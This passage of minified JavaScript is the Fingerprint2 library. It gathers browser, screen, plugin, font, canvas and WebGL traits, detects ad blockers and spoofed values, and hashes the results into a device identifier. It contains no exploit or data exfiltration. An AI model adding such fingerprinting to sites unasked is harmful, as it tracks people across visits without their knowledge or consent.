!function(e,t,i){"use strict";t[e]=i()}("Fingerprint2",this,function(){"use strict";Array.prototype.indexOf||(Array.prototype.indexOf=function(e,t){var i;if(null==this)throw new TypeError("'this' is null or undefined");var a=Object(this),r=a.length>>>0;if(0===r)return-1;var n=+t||0;if(Math.abs(n)===1/0&&(n=0),n>=r)return-1;for(i=Math.max(n>=0?n:r-Math.abs(n),0);i<r;){if(i in a&&a[i]===e)return i;i++}return-1});var e=function(t){if(!(this instanceof e))return new e(t);var i={swfContainerId:"fingerprintjs2",swfPath:"flash/compiled/FontList.swf",detectScreenOrientation:!0,sortPluginsFor:[/palemoon/i],userDefinedFonts:[]};this.options=this.extend(t,i),this.nativeForEach=Array.prototype.forEach,this.nativeMap=Array.prototype.map};return e.prototype={extend:function(e,t){if(null==e)return t;for(var i in e)null!=e[i]&&t[i]!==e[i]&&(t[i]=e[i]);return t},log:function(e){window.console&&console.log(e)},get:function(e){var t=[];t=this.userAgentKey(t),t=this.languageKey(t),t=this.colorDepthKey(t),t=this.pixelRatioKey(t),t=this.screenResolutionKey(t),t=this.availableScreenResolutionKey(t),t=this.timezoneOffsetKey(t),t=this.sessionStorageKey(t),t=this.localStorageKey(t),t=this.indexedDbKey(t),t=this.addBehaviorKey(t),t=this.openDatabaseKey(t),t=this.cpuClassKey(t),t=this.platformKey(t),t=this.doNotTrackKey(t),t=this.pluginsKey(t),t=this.canvasKey(t),t=this.webglKey(t),t=this.adBlockKey(t),t=this.hasLiedLanguagesKey(t),t=this.hasLiedResolutionKey(t),t=this.hasLiedOsKey(t),t=this.hasLiedBrowserKey(t),t=this.touchSupportKey(t);var i=this;this.fontsKey(t,function(t){var a=[];i.each(t,function(e){var t=e.value;"undefined"!=typeof e.value.join&&(t=e.value.join(";")),a.push(t)});var r=i.x64hash128(a.join("~~~"),31);return e(r,t)})},userAgentKey:function(e){return this.options.excludeUserAgent||e.push({key:"user_agent",value:this.getUserAgent()}),e},getUserAgent:function(){return navigator.userAgent},languageKey:function(e){return this.options.excludeLanguage||e.push({key:"language",value:navigator.language||navigator.userLanguage||navigator.browserLanguage||navigator.systemLanguage||""}),e},colorDepthKey:function(e){return this.options.excludeColorDepth||e.push({key:"color_depth",value:screen.colorDepth||-1}),e},pixelRatioKey:function(e){return this.options.excludePixelRatio||e.push({key:"pixel_ratio",value:this.getPixelRatio()}),e},getPixelRatio:function(){return window.devicePixelRatio||""},screenResolutionKey:function(e){return this.options.excludeScreenResolution?e:this.getScreenResolution(e)},getScreenResolution:function(e){var t;return t=this.options.detectScreenOrientation&&screen.height>screen.width?[screen.height,screen.width]:[screen.width,screen.height],"undefined"!=typeof t&&e.push({key:"resolution",value:t}),e},availableScreenResolutionKey:function(e){return this.options.excludeAvailableScreenResolution?e:this.getAvailableScreenResolution(e)},getAvailableScreenResolution:function(e){var t;return screen.availWidth&&screen.availHeight&&(t=this.options.detectScreenOrientation?screen.availHeight>screen.availWidth?[screen.availHeight,screen.availWidth]:[screen.availWidth,screen.availHeight]:[screen.availHeight,screen.availWidth]),"undefined"!=typeof t&&e.push({key:"available_resolution",value:t}),e},timezoneOffsetKey:function(e){return this.options.excludeTimezoneOffset||e.push({key:"timezone_offset",value:(new Date).getTimezoneOffset()}),e},sessionStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasSessionStorage()&&e.push({key:"session_storage",value:1}),e},localStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasLocalStorage()&&e.push({key:"local_storage",value:1}),e},indexedDbKey:function(e){return!this.options.excludeIndexedDB&&this.hasIndexedDB()&&e.push({key:"indexed_db",value:1}),e},addBehaviorKey:function(e){return document.body&&!this.options.excludeAddBehavior&&document.body.addBehavior&&e.push({key:"add_behavior",value:1}),e},openDatabaseKey:function(e){return!this.options.excludeOpenDatabase&&window.openDatabase&&e.push({key:"open_database",value:1}),e},cpuClassKey:function(e){return this.options.excludeCpuClass||e.push({key:"cpu_class",value:this.getNavigatorCpuClass()}),e},platformKey:function(e){return this.options.excludePlatform||e.push({key:"navigator_platform",value:this.getNavigatorPlatform()}),e},doNotTrackKey:function(e){return this.options.excludeDoNotTrack||e.push({key:"do_not_track",value:this.getDoNotTrack()}),e},canvasKey:function(e){return!this.options.excludeCanvas&&this.isCanvasSupported()&&e.push({key:"canvas",value:this.getCanvasFp()}),e},webglKey:function(e){return this.options.excludeWebGL?e:this.isWebGlSupported()?(e.push({key:"webgl",value:this.getWebglFp()}),e):e},adBlockKey:function(e){return this.options.excludeAdBlock||e.push({key:"adblock",value:this.getAdBlock()}),e},hasLiedLanguagesKey:function(e){return this.options.excludeHasLiedLanguages||e.push({key:"has_lied_languages",value:this.getHasLiedLanguages()}),e},hasLiedResolutionKey:function(e){return this.options.excludeHasLiedResolution||e.push({key:"has_lied_resolution",value:this.getHasLiedResolution()}),e},hasLiedOsKey:function(e){return this.options.excludeHasLiedOs||e.push({key:"has_lied_os",value:this.getHasLiedOs()}),e},hasLiedBrowserKey:function(e){return this.options.excludeHasLiedBrowser||e.push({key:"has_lied_browser",value:this.getHasLiedBrowser()}),e},fontsKey:function(e,t){return this.options.excludeJsFonts?this.flashFontsKey(e,t):this.jsFontsKey(e,t)},flashFontsKey:function(e,t){return this.options.excludeFlashFonts?t(e):this.hasSwfObjectLoaded()&&this.hasMinFlashInstalled()?"undefined"==typeof this.options.swfPath?t(e):void this.loadSwfAndDetectFonts(function(i){e.push({key:"swf_fonts",value:i.join(";")}),t(e)}):t(e)},jsFontsKey:function(e,t){var i=this;return setTimeout(function(){var a=["monospace","sans-serif","serif"],r=["Andale Mono","Arial","Arial Black","Arial Hebrew","Arial MT","Arial Narrow","Arial Rounded MT Bold","Arial Unicode MS","Bitstream Vera Sans Mono","Book Antiqua","Bookman Old Style","Calibri","Cambria","Cambria Math","Century","Century Gothic","Century Schoolbook","Comic Sans","Comic Sans MS","Consolas","Courier","Courier New","Garamond","Geneva","Georgia","Helvetica","Helvetica Neue","Impact","Lucida Bright","Lucida Calligraphy","Lucida Console","Lucida Fax","LUCIDA GRANDE","Lucida Handwriting","Lucida Sans","Lucida Sans Typewriter","Lucida Sans Unicode","Microsoft Sans Serif","Monaco","Monotype Corsiva","MS Gothic","MS Outlook","MS PGothic","MS Reference Sans Serif","MS Sans Serif","MS Serif","MYRIAD","MYRIAD PRO","Palatino","Palatino Linotype","Segoe Print","Segoe Script","Segoe UI","Segoe UI Light","Segoe UI Semibold","Segoe UI Symbol","Tahoma","Times","Times New Roman","Times New Roman PS","Trebuchet MS","Verdana","Wingdings","Wingdings 2","Wingdings 3"],n=["Abadi MT Condensed Light","Academy Engraved LET","ADOBE CASLON PRO","Adobe Garamond","ADOBE GARAMOND PRO","Agency FB","Aharoni","Albertus Extra Bold","Albertus Medium","Algerian","Amazone BT","American Typewriter","American Typewriter Condensed","AmerType Md BT","Andalus","Angsana New","AngsanaUPC","Antique Olive","Aparajita","Apple Chancery","Apple Color Emoji","Apple SD Gothic Neo","Arabic Typesetting","ARCHER","ARNO PRO","Arrus BT","Aurora Cn BT","AvantGarde Bk BT","AvantGarde Md BT","AVENIR","Ayuthaya","Bandy","Bangla Sangam MN","Bank Gothic","BankGothic Md BT","Baskerville","Baskerville Old Face","Batang","BatangChe","Bauer Bodoni","Bauhaus 93","Bazooka","Bell MT","Bembo","Benguiat Bk BT","Berlin Sans FB","Berlin Sans FB Demi","Bernard MT Condensed","BernhardFashion BT","BernhardMod BT","Big Caslon","BinnerD","Blackadder ITC","BlairMdITC TT","Bodoni 72","Bodoni 72 Oldstyle","Bodoni 72 Smallcaps","Bodoni MT","Bodoni MT Black","Bodoni MT Condensed","Bodoni MT Poster Compressed","Bookshelf Symbol 7","Boulder","Bradley Hand","Bradley Hand ITC","Bremen Bd BT","Britannic Bold","Broadway","Browallia New","BrowalliaUPC","Brush Script MT","Californian FB","Calisto MT","Calligrapher","Candara","CaslonOpnface BT","Castellar","Centaur","Cezanne","CG Omega","CG Times","Chalkboard","Chalkboard SE","Chalkduster","Charlesworth","Charter Bd BT","Charter BT","Chaucer","ChelthmITC Bk BT","Chiller","Clarendon","Clarendon Condensed","CloisterBlack BT","Cochin","Colonna MT","Constantia","Cooper Black","Copperplate","Copperplate Gothic","Copperplate Gothic Bold","Copperplate Gothic Light","CopperplGoth Bd BT","Corbel","Cordia New","CordiaUPC","Cornerstone","Coronet","Cuckoo","Curlz MT","DaunPenh","Dauphin","David","DB LCD Temp","DELICIOUS","Denmark","DFKai-SB","Didot","DilleniaUPC","DIN","DokChampa","Dotum","DotumChe","Ebrima","Edwardian Script ITC","Elephant","English 111 Vivace BT","Engravers MT","EngraversGothic BT","Eras Bold ITC","Eras Demi ITC","Eras Light ITC","Eras Medium ITC","EucrosiaUPC","Euphemia","Euphemia UCAS","EUROSTILE","Exotc350 Bd BT","FangSong","Felix Titling","Fixedsys","FONTIN","Footlight MT Light","Forte","FrankRuehl","Fransiscan","Freefrm721 Blk BT","FreesiaUPC","Freestyle Script","French Script MT","FrnkGothITC Bk BT","Fruitger","FRUTIGER","Futura","Futura Bk BT","Futura Lt BT","Futura Md BT","Futura ZBlk BT","FuturaBlack BT","Gabriola","Galliard BT","Gautami","Geeza Pro","Geometr231 BT","Geometr231 Hv BT","Geometr231 Lt BT","GeoSlab 703 Lt BT","GeoSlab 703 XBd BT","Gigi","Gill Sans","Gill Sans MT","Gill Sans MT Condensed","Gill Sans MT Ext Condensed Bold","Gill Sans Ultra Bold","Gill Sans Ultra Bold Condensed","Gisha","Gloucester MT Extra Condensed","GOTHAM","GOTHAM BOLD","Goudy Old Style","Goudy Stout","GoudyHandtooled BT","GoudyOLSt BT","Gujarati Sangam MN","Gulim","GulimChe","Gungsuh","GungsuhChe","Gurmukhi MN","Haettenschweiler","Harlow Solid Italic","Harrington","Heather","Heiti SC","Heiti TC","HELV","Herald","High Tower Text","Hiragino Kaku Gothic ProN","Hiragino Mincho ProN","Hoefler Text","Humanst 521 Cn BT","Humanst521 BT","Humanst521 Lt BT","Imprint MT Shadow","Incised901 Bd BT","Incised901 BT","Incised901 Lt BT","INCONSOLATA","Informal Roman","Informal011 BT","INTERSTATE","IrisUPC","Iskoola Pota","JasmineUPC","Jazz LET","Jenson","Jester","Jokerman","Juice ITC","Kabel Bk BT","Kabel Ult BT","Kailasa","KaiTi","Kalinga","Kannada Sangam MN","Kartika","Kaufmann Bd BT","Kaufmann BT","Khmer UI","KodchiangUPC","Kokila","Korinna BT","Kristen ITC","Krungthep","Kunstler Script","Lao UI","Latha","Leelawadee","Letter Gothic","Levenim MT","LilyUPC","Lithograph","Lithograph Light","Long Island","Lydian BT","Magneto","Maiandra GD","Malayalam Sangam MN","Malgun Gothic","Mangal","Marigold","Marion","Marker Felt","Market","Marlett","Matisse ITC","Matura MT Script Capitals","Meiryo","Meiryo UI","Microsoft Himalaya","Microsoft JhengHei","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Uighur","Microsoft YaHei","Microsoft Yi Baiti","MingLiU","MingLiU_HKSCS","MingLiU_HKSCS-ExtB","MingLiU-ExtB","Minion","Minion Pro","Miriam","Miriam Fixed","Mistral","Modern","Modern No. 20","Mona Lisa Solid ITC TT","Mongolian Baiti","MONO","MoolBoran","Mrs Eaves","MS LineDraw","MS Mincho","MS PMincho","MS Reference Specialty","MS UI Gothic","MT Extra","MUSEO","MV Boli","Nadeem","Narkisim","NEVIS","News Gothic","News GothicMT","NewsGoth BT","Niagara Engraved","Niagara Solid","Noteworthy","NSimSun","Nyala","OCR A Extended","Old Century","Old English Text MT","Onyx","Onyx BT","OPTIMA","Oriya Sangam MN","OSAKA","OzHandicraft BT","Palace Script MT","Papyrus","Parchment","Party LET","Pegasus","Perpetua","Perpetua Titling MT","PetitaBold","Pickwick","Plantagenet Cherokee","Playbill","PMingLiU","PMingLiU-ExtB","Poor Richard","Poster","PosterBodoni BT","PRINCETOWN LET","Pristina","PTBarnum BT","Pythagoras","Raavi","Rage Italic","Ravie","Ribbon131 Bd BT","Rockwell","Rockwell Condensed","Rockwell Extra Bold","Rod","Roman","Sakkal Majalla","Santa Fe LET","Savoye LET","Sceptre","Script","Script MT Bold","SCRIPTINA","Serifa","Serifa BT","Serifa Th BT","ShelleyVolante BT","Sherwood","Shonar Bangla","Showcard Gothic","Shruti","Signboard","SILKSCREEN","SimHei","Simplified Arabic","Simplified Arabic Fixed","SimSun","SimSun-ExtB","Sinhala Sangam MN","Sketch Rockwell","Skia","Small Fonts","Snap ITC","Snell Roundhand","Socket","Souvenir Lt BT","Staccato222 BT","Steamer","Stencil","Storybook","Styllo","Subway","Swis721 BlkEx BT","Swiss911 XCm BT","Sylfaen","Synchro LET","System","Tamil Sangam MN","Technical","Teletype","Telugu Sangam MN","Tempus Sans ITC","Terminal","Thonburi","Traditional Arabic","Trajan","TRAJAN PRO","Tristan","Tubular","Tunga","Tw Cen MT","Tw Cen MT Condensed","Tw Cen MT Condensed Extra Bold","TypoUpright BT","Unicorn","Univers","Univers CE 55 Medium","Univers Condensed","Utsaah","Vagabond","Vani","Vijaya","Viner Hand ITC","VisualUI","Vivaldi","Vladimir Script","Vrinda","Westminster","WHITNEY","Wide Latin","ZapfEllipt BT","ZapfHumnst BT","ZapfHumnst Dm BT","Zapfino","Zurich BlkEx BT","Zurich Ex BT","ZWAdobeF"];i.options.extendedJsFonts&&(r=r.concat(n)),r=r.concat(i.options.userDefinedFonts);var o="mmmmmmmmmmlli",s="72px",l=document.getElementsByTagName("body")[0],h=document.createElement("div"),u=document.createElement("div"),d={},c={},g=function(){var e=document.createElement("span");return e.style.position="absolute",e.style.left="-9999px",e.style.fontSize=s,e.style.lineHeight="normal",e.innerHTML=o,e},p=function(e,t){var i=g();return i.style.fontFamily="'"+e+"',"+t,i},f=function(){for(var e=[],t=0,i=a.length;t<i;t++){var r=g();r.style.fontFamily=a[t],h.appendChild(r),e.push(r)}return e},m=function(){for(var e={},t=0,i=r.length;t<i;t++){for(var n=[],o=0,s=a.length;o<s;o++){var l=p(r[t],a[o]);u.appendChild(l),n.push(l)}e[r[t]]=n}return e},T=function(e){for(var t=!1,i=0;i<a.length;i++)if(t=e[i].offsetWidth!==d[a[i]]||e[i].offsetHeight!==c[a[i]])return t;return t},S=f();l.appendChild(h);for(var x=0,v=a.length;x<v;x++)d[a[x]]=S[x].offsetWidth,c[a[x]]=S[x].offsetHeight;var M=m();l.appendChild(u);for(var A=[],E=0,y=r.length;E<y;E++)T(M[r[E]])&&A.push(r[E]);l.removeChild(u),l.removeChild(h),e.push({key:"js_fonts",value:A}),t(e)},1)},pluginsKey:function(e){return this.options.excludePlugins||(this.isIE()?this.options.excludeIEPlugins||e.push({key:"ie_plugins",value:this.getIEPlugins()}):e.push({key:"regular_plugins",value:this.getRegularPlugins()})),e},getRegularPlugins:function(){for(var e=[],t=0,i=navigator.plugins.length;t<i;t++)e.push(navigator.plugins[t]);return this.pluginsShouldBeSorted()&&(e=e.sort(function(e,t){return e.name>t.name?1:e.name<t.name?-1:0})),this.map(e,function(e){var t=this.map(e,function(e){return[e.type,e.suffixes].join("~")}).join(",");return[e.name,e.description,t].join("::")},this)},getIEPlugins:function(){var e=[];if(Object.getOwnPropertyDescriptor&&Object.getOwnPropertyDescriptor(window,"ActiveXObject")||"ActiveXObject"in window){var t=["AcroPDF.PDF","Adodb.Stream","AgControl.AgControl","DevalVRXCtrl.DevalVRXCtrl.1","MacromediaFlashPaper.MacromediaFlashPaper","Msxml2.DOMDocument","Msxml2.XMLHTTP","PDF.PdfCtrl","QuickTime.QuickTime","QuickTimeCheckObject.QuickTimeCheck.1","RealPlayer","RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)","RealVideo.RealVideo(tm) ActiveX Control (32-bit)","Scripting.Dictionary","SWCtl.SWCtl","Shell.UIHelper","ShockwaveFlash.ShockwaveFlash","Skype.Detection","TDCCtl.TDCCtl","WMPlayer.OCX","rmocx.RealPlayer G2 Control","rmocx.RealPlayer G2 Control.1"];e=this.map(t,function(e){try{return new ActiveXObject(e),e}catch(t){return null}})}return navigator.plugins&&(e=e.concat(this.getRegularPlugins())),e},pluginsShouldBeSorted:function(){for(var e=!1,t=0,i=this.options.sortPluginsFor.length;t<i;t++){var a=this.options.sortPluginsFor[t];if(navigator.userAgent.match(a)){e=!0;break}}return e},touchSupportKey:function(e){return this.options.excludeTouchSupport||e.push({key:"touch_support",value:this.getTouchSupport()}),e},hasSessionStorage:function(){try{return!!window.sessionStorage}catch(e){return!0}},hasLocalStorage:function(){try{return!!window.localStorage}catch(e){return!0}},hasIndexedDB:function(){return!!window.indexedDB},getNavigatorCpuClass:function(){return navigator.cpuClass?navigator.cpuClass:"unknown"},getNavigatorPlatform:function(){return navigator.platform?navigator.platform:"unknown"},getDoNotTrack:function(){return navigator.doNotTrack?navigator.doNotTrack:navigator.msDoNotTrack?navigator.msDoNotTrack:window.doNotTrack?window.doNotTrack:"unknown"},getTouchSupport:function(){var e=0,t=!1;"undefined"!=typeof navigator.maxTouchPoints?e=navigator.maxTouchPoints:"undefined"!=typeof navigator.msMaxTouchPoints&&(e=navigator.msMaxTouchPoints);try{document.createEvent("TouchEvent"),t=!0}catch(i){}var a="ontouchstart"in window;return[e,t,a]},getCanvasFp:function(){var e=[],t=document.createElement("canvas");t.width=2e3,t.height=200,t.style.display="inline";var i=t.getContext("2d");return i.rect(0,0,10,10),i.rect(2,2,6,6),e.push("canvas winding:"+(i.isPointInPath(5,5,"evenodd")===!1?"yes":"no")),i.textBaseline="alphabetic",i.fillStyle="#f60",i.fillRect(125,1,62,20),i.fillStyle="#069",this.options.dontUseFakeFontInCanvas?i.font="11pt Arial":i.font="11pt no-real-font-123",i.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",2,15),i.fillStyle="rgba(102, 204, 0, 0.2)",i.font="18pt Arial",i.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",4,45),i.globalCompositeOperation="multiply",i.fillStyle="rgb(255,0,255)",i.beginPath(),i.arc(50,50,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(0,255,255)",i.beginPath(),i.arc(100,50,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(255,255,0)",i.beginPath(),i.arc(75,100,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(255,0,255)",i.arc(75,75,75,0,2*Math.PI,!0),i.arc(75,75,25,0,2*Math.PI,!0),i.fill("evenodd"),e.push("canvas fp:"+t.toDataURL()),e.join("~")},getWebglFp:function(){var e,t=function(t){return e.clearColor(0,0,0,1),e.enable(e.DEPTH_TEST),e.depthFunc(e.LEQUAL),e.clear(e.COLOR_BUFFER_BIT|e.DEPTH_BUFFER_BIT),"["+t[0]+", "+t[1]+"]"},i=function(e){var t,i=e.getExtension("EXT_texture_filter_anisotropic")||e.getExtension("WEBKIT_EXT_texture_filter_anisotropic")||e.getExtension("MOZ_EXT_texture_filter_anisotropic");return i?(t=e.getParameter(i.MAX_TEXTURE_MAX_ANISOTROPY_EXT),0===t&&(t=2),t):null};if(e=this.getWebglCanvas(),!e)return null;var a=[],r="attribute vec2 attrVertex;varying vec2 varyinTexCoordinate;uniform vec2 uniformOffset;void main(){varyinTexCoordinate=attrVertex+uniformOffset;gl_Position=vec4(attrVertex,0,1);}",n="precision mediump float;varying vec2 varyinTexCoordinate;void main() {gl_FragColor=vec4(varyinTexCoordinate,0,1);}",o=e.createBuffer();e.bindBuffer(e.ARRAY_BUFFER,o);var s=new Float32Array([-.2,-.9,0,.4,-.26,0,0,.732134444,0]);e.bufferData(e.ARRAY_BUFFER,s,e.STATIC_DRAW),o.itemSize=3,o.numItems=3;var l=e.createProgram(),h=e.createShader(e.VERTEX_SHADER);e.shaderSource(h,r),e.compileShader(h);var u=e.createShader(e.FRAGMENT_SHADER);return e.shaderSource(u,n),e.compileShader(u),e.attachShader(l,h),e.attachShader(l,u),e.linkProgram(l),e.useProgram(l),l.vertexPosAttrib=e.getAttribLocation(l,"attrVertex"),l.offsetUniform=e.getUniformLocation(l,"uniformOffset"),e.enableVertexAttribArray(l.vertexPosArray),e.vertexAttribPointer(l.vertexPosAttrib,o.itemSize,e.FLOAT,!1,0,0),e.uniform2f(l.offsetUniform,1,1),e.drawArrays(e.TRIANGLE_STRIP,0,o.numItems),null!=e.canvas&&a.push(e.canvas.toDataURL()),a.push("extensions:"+e.getSupportedExtensions().join(";")),a.push("webgl aliased line width range:"+t(e.getParameter(e.ALIASED_LINE_WIDTH_RANGE))),a.push("webgl aliased point size range:"+t(e.getParameter(e.ALIASED_POINT_SIZE_RANGE))),a.push("webgl alpha bits:"+e.getParameter(e.ALPHA_BITS)),a.push("webgl antialiasing:"+(e.getContextAttributes().antialias?"yes":"no")),a.push("webgl blue bits:"+e.getParameter(e.BLUE_BITS)),a.push("webgl depth bits:"+e.getParameter(e.DEPTH_BITS)),a.push("webgl green bits:"+e.getParameter(e.GREEN_BITS)),a.push("webgl max anisotropy:"+i(e)),a.push("webgl max combined texture image units:"+e.getParameter(e.MAX_COMBINED_TEXTURE_IMAGE_UNITS)),a.push("webgl max cube map texture size:"+e.getParameter(e.MAX_CUBE_MAP_TEXTURE_SIZE)),a.push("webgl max fragment uniform vectors:"+e.getParameter(e.MAX_FRAGMENT_UNIFORM_VECTORS)),a.push("webgl max render buffer size:"+e.getParameter(e.MAX_RENDERBUFFER_SIZE)),a.push("webgl max texture image units:"+e.getParameter(e.MAX_TEXTURE_IMAGE_UNITS)),a.push("webgl max texture size:"+e.getParameter(e.MAX_TEXTURE_SIZE)),a.push("webgl max varying vectors:"+e.getParameter(e.MAX_VARYING_VECTORS)),a.push("webgl max vertex attribs:"+e.getParameter(e.MAX_VERTEX_ATTRIBS)),a.push("webgl max vertex texture image units:"+e.getParameter(e.MAX_VERTEX_TEXTURE_IMAGE_UNITS)),a.push("webgl max vertex uniform vectors:"+e.getParameter(e.MAX_VERTEX_UNIFORM_VECTORS)),a.push("webgl max viewport dims:"+t(e.getParameter(e.MAX_VIEWPORT_DIMS))),a.push("webgl red bits:"+e.getParameter(e.RED_BITS)),a.push("webgl renderer:"+e.getParameter(e.RENDERER)),a.push("webgl shading language version:"+e.getParameter(e.SHADING_LANGUAGE_VERSION)),a.push("webgl stencil bits:"+e.getParameter(e.STENCIL_BITS)),a.push("webgl vendor:"+e.getParameter(e.VENDOR)),a.push("webgl version:"+e.getParameter(e.VERSION)),e.getShaderPrecisionFormat?(a.push("webgl vertex shader high float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).precision),a.push("webgl vertex shader high float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).rangeMin),a.push("webgl vertex shader high float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).rangeMax),a.push("webgl vertex shader medium float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).precision),a.push("webgl vertex shader medium float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).rangeMin),a.push("webgl vertex shader medium float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).rangeMax),a.push("webgl vertex shader low float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).precision),a.push("webgl vertex shader low float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).rangeMin),a.push("webgl vertex shader low float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).rangeMax),a.push("webgl fragment shader high float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).precision),a.push("webgl fragment shader high float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).rangeMin),a.push("webgl fragment shader high float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).rangeMax),a.push("webgl fragment shader medium float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).precision),a.push("webgl fragment shader medium float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).rangeMin),a.push("webgl fragment shader medium float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).rangeMax),a.push("webgl fragment shader low float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).precision),a.push("webgl fragment shader low float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).rangeMin),a.push("webgl fragment shader low float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).rangeMax),a.push("webgl vertex shader high int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).precision),a.push("webgl vertex shader high int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).rangeMin),a.push("webgl vertex shader high int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).rangeMax),a.push("webgl vertex shader medium int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).precision),a.push("webgl vertex shader medium int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).rangeMin),a.push("webgl vertex shader medium int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).rangeMax),a.push("webgl vertex shader low int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).precision),a.push("webgl vertex shader low int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).rangeMin),a.push("webgl vertex shader low int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).rangeMax),a.push("webgl fragment shader high int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).precision),a.push("webgl fragment shader high int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).rangeMin),a.push("webgl fragment shader high int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).rangeMax),a.push("webgl fragment shader medium int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).precision),a.push("webgl fragment shader medium int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).rangeMin),a.push("webgl fragment shader medium int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).rangeMax),a.push("webgl fragment shader low int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).precision),a.push("webgl fragment shader low int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).rangeMin),a.push("webgl fragment shader low int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).rangeMax),a.join("~")):a.join("~")},getAdBlock:function(){var e=document.createElement("div");e.innerHTML="&nbsp;",e.className="adsbox";var t=!1;try{document.body.appendChild(e),t=0===document.getElementsByClassName("adsbox")[0].offsetHeight,document.body.removeChild(e)}catch(i){t=!1}return t},getHasLiedLanguages:function(){if("undefined"!=typeof navigator.languages)try{var e=navigator.languages[0].substr(0,2);if(e!==navigator.language.substr(0,2))return!0}catch(t){return!0}return!1},getHasLiedResolution:function(){return screen.width<screen.availWidth||screen.height<screen.availHeight},getHasLiedOs:function(){var e,t=navigator.userAgent.toLowerCase(),i=navigator.oscpu,a=navigator.platform.toLowerCase();e=t.indexOf("windows phone")>=0?"Windows Phone":t.indexOf("win")>=0?"Windows":t.indexOf("android")>=0?"Android":t.indexOf("linux")>=0?"Linux":t.indexOf("iphone")>=0||t.indexOf("ipad")>=0?"iOS":t.indexOf("mac")>=0?"Mac":"Other";var r;if(r="ontouchstart"in window||navigator.maxTouchPoints>0||navigator.msMaxTouchPoints>0,r&&"Windows Phone"!==e&&"Android"!==e&&"iOS"!==e&&"Other"!==e)return!0;if("undefined"!=typeof i){if(i=i.toLowerCase(),i.indexOf("win")>=0&&"Windows"!==e&&"Windows Phone"!==e)return!0;if(i.indexOf("linux")>=0&&"Linux"!==e&&"Android"!==e)return!0;if(i.indexOf("mac")>=0&&"Mac"!==e&&"iOS"!==e)return!0;if(0===i.indexOf("win")&&0===i.indexOf("linux")&&i.indexOf("mac")>=0&&"other"!==e)return!0}return a.indexOf("win")>=0&&"Windows"!==e&&"Windows Phone"!==e||((a.indexOf("linux")>=0||a.indexOf("android")>=0||a.indexOf("pike")>=0)&&"Linux"!==e&&"Android"!==e||((a.indexOf("mac")>=0||a.indexOf("ipad")>=0||a.indexOf("ipod")>=0||a.indexOf("iphone")>=0)&&"Mac"!==e&&"iOS"!==e||(0===a.indexOf("win")&&0===a.indexOf("linux")&&a.indexOf("mac")>=0&&"other"!==e||"undefined"==typeof navigator.plugins&&"Windows"!==e&&"Windows Phone"!==e)))},getHasLiedBrowser:function(){var 